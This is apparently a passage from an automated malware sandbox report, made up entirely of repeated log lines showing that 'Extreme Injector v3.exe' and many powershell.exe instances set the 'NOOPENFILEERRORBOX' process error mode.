                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
